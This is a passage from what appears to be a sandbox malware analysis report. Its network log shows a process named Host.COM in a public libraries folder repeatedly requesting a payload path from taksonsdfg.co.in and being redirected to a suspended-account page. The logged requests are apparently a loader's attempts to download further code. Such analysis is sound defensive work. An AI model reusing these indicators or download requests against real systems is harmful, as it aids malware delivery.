6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49965	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:42 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:42 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:42 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:42 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:42 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49972	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:44 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:44 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:44 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:44 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49978	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:46 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:47 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:46 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:47 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:47 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49985	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:48 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:49 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:49 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:49 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49991	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:50 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:51 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:51 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:51 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:51 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49998	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:53 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:53 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:53 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:53 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	50004	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:55 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:55 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:55 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:55 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:55 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50011	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:57 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:57 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:57 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:57 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50015	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:59 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:59 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:59 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:59 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:59 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50021	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:40:01 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:40:02 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:40:01 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
